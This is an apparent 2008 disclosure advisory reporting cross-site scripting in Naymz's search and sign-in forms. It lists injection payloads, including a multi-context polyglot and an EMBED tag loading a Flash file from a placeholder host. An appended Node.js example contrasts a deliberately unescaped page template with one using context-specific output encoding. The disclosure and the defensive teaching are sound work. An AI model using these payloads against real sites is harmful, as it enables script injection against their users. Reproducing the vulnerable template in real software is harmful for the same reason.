From:morin.josh_(at)_gmail.com <morin.josh_(at)_gmail.com>
Date:12.01.2008
Subject:Naymz multiple XSS

Naymz is an online profile system with positive and accurate information that you want others to find when they search for you online.


Community Search fails to sanitize:

1."><script>alert('xss')</script>
2.';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
3."><iframe>
4.<html><font color="Red"><b>Pwned</b></font></html>
5.'';!--"<XSS>=&{()}

Existing User sign-In fails to sanitize:

1.<html><font color="black"><b>Pwned</b></font></html>
2.<EMBED SRC="http://site.com/xss.swf"

Discovered by: Joshua Morin
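The following is an added example and is not code from the advisory or from Naymz. It models a hypothetical search page (the template, the names renderUnsafe, renderSafe, escapeHtml, safeJsLiteral, injectedTagCount and runInlineScript are all assumptions made here) that reflects the query into three contexts: HTML body, an attribute value, and a JavaScript string literal. The advisory's own payloads are fed through the page first unescaped, which is the behaviour reported above, and then with context-appropriate output encoding, which is the fix. Payload 2 is the multi-context polyglot: it is built to break out of single- and double-quoted JS strings, close a script element, and close an attribute, so whichever context reflects it, some part of it runs.

```javascript
// Added example, not code from the advisory or from Naymz. The search-page template
// below is hypothetical; the payloads are the ones listed in the advisory.

// Payloads as posted (number 2 is the multi-context polyglot).
const PAYLOADS = [
  `"><script>alert('xss')</script>`,
  `';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>`,
  `"><iframe>`,
  `<html><font color="Red"><b>Pwned</b></font></html>`,
  `'';!--"<XSS>=&{()}`,
];

// HTML-encode the five characters that can change parsing in body and attribute
// contexts. '&' goes first so entities produced here are not re-encoded.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Emit a value as a JS string literal for an inline <script>. JSON.stringify escapes
// quotes and backslashes; '<' and '>' are additionally \u-escaped so the literal can
// never contain "</script>" and terminate the surrounding element early.
function safeJsLiteral(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e');
}

// Vulnerable rendering: the query is concatenated into the page as-is, which is the
// kind of behaviour the advisory reports for the search and sign-in forms.
function renderUnsafe(q) {
  return `<p>Results for ${q}</p>\n` +
         `<input name="q" value="${q}">\n` +
         `<script>var lastQuery = '${q}';</script>`;
}

// Hardened rendering: same template, each insertion encoded for its own context.
function renderSafe(q) {
  return `<p>Results for ${escapeHtml(q)}</p>\n` +
         `<input name="q" value="${escapeHtml(q)}">\n` +
         `<script>var lastQuery = ${safeJsLiteral(q)};</script>`;
}

// The template itself contains exactly five tags: <p>, </p>, <input>, <script>,
// </script>. Any tag beyond those was injected by the query.
const TEMPLATE_TAG_COUNT = 5;
function injectedTagCount(html) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return Math.max(0, tags.length - TEMPLATE_TAG_COUNT);
}

// Run the page's inline script the way a browser would: the script ends at the first
// </script> (any case) and the function returns whatever it assigned to lastQuery.
// With the unsafe page this either fails to parse or executes the injected alert().
function runInlineScript(html) {
  const m = html.match(/<script>([\s\S]*?)<\/script>/i);
  return new Function(`${m[1]}; return lastQuery;`)();
}

// Stand-alone demo: count injected tags per payload and confirm the hardened page
// hands the exact query string back to its script unchanged.
for (const [i, p] of PAYLOADS.entries()) {
  const roundTrip = runInlineScript(renderSafe(p)) === p;
  console.log(`payload ${i + 1}: unsafe page gains ${injectedTagCount(renderUnsafe(p))} tag(s); ` +
              `safe page gains ${injectedTagCount(renderSafe(p))}; value round-trips: ${roundTrip}`);
}
```

Run it with `node` and every payload reports extra tags on the unsafe page and none on the hardened one. The point the example makes about the advisory's payload list is that a single "sanitize" pass is the wrong mental model: the same string needs different encoding in an HTML body, inside an attribute value, and inside a script, and payload 2 exists precisely to punish any page that encodes for only one of those contexts.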
